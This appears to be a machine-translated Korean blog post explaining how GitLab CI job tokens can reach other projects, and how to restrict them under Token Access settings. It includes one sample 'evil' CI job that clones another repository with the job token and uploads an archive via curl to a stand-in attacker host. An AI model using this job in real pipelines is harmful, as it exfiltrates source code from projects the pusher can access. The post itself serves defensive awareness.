보안 GTLabCI 태스크 토큰
보안 GTLabCI 태스크 토큰
GTLab CI 편해요!없으면 죽어.
GitLabCI 작업을 수행할 때CI 토큰 발행된 것으로 CI 작업 중의git 창고에서 얻을 수 있습니다.일부 GitLab API는 CI 태스크 토큰을 수락하므로 GitLab Contaainer Registry로 이동할 수도 있습니다.
진짜 무서운 CI 토큰
대략적으로 말하면, CI 퀘스트 영패는 권한이 있는 개인 방문 영패이다.CI 킥을 하는 모든 사람(밀어내는 사람 및 병합하는 사람 포함)이 액세스할 수 있는 그룹과 항목에 액세스할 수 있습니다.
공격자는 같은 프로젝트에 참가한 구성원에게 CI 임무를 수행하게 함으로써 이 구성원이 참가한 다른 프로젝트를 방문할 수 있다.
evil:
script:
- git clone https://gitlab-ci-token:${CI_JOB_TOKEN}/gitlab.example.com/sigma/sigma.git
- tar zcvf sigma.tar.gz sigma
- curl -X POST -F file1=sigma.tar.gz http://hanako.example.jp/evil
타로가 삼각주 프로젝트로 밀어붙이면 이evil
작업이 시작되고 원본 코드가 조용히 뽑힌다.불곰 종목이 아무리 안전에 신경을 써도 거친 삼각주 종목 때문에 영향을 받을 수 있다.
CI 토큰의 역할 범위 제한
Limit GitLab CI/CD job token access에 쓰인 바와 같다.
프로젝트 열기
Settings
->CI/CD
->Token Access
, 열기Limit CI_JOB_TOKEN access
.이 항목에서는 다른 항목에 대한 CI 태스크 토큰이 더 이상 수락되지 않습니다.
특정 프로젝트에 대한 CI 태스크 토큰을 허용할 수도 있습니다.여러 프로젝트를 연합할 때 이 항목을 설정합니다.
Reference
이 문제에 관하여(보안 GTLabCI 태스크 토큰), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://zenn.dev/masakura/articles/50ca1204714fde텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)